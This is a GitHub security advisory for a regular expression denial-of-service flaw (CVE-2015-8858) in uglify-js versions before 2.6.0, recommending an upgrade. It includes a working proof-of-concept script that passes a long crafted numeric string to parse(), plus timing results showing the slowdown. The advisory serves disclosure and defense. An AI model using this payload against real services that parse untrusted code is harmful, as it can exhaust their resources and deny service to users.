Skip to content

Regular Expression Denial of Service in uglify-js

high severity GitHub Reviewed Published Oct 24, 2017 • Updated Sep 8, 2021

Package

npm uglify-js (npm)

Affected versions

< 2.6.0

Patched versions

2.6.0

Description

Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.

Proof of Concept

var u = require('uglify-js');
var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}

u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");

Results

$ time node test.js 10000
real	0m1.091s
user	0m1.047s
sys	0m0.039s

$ time node test.js 80000
real	0m6.486s
user	0m6.229s
sys	0m0.094s

Recommendation

Update to version 2.6.0 or later.

References

CVE ID

CVE-2015-8858

CVSS Score

7.5 High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H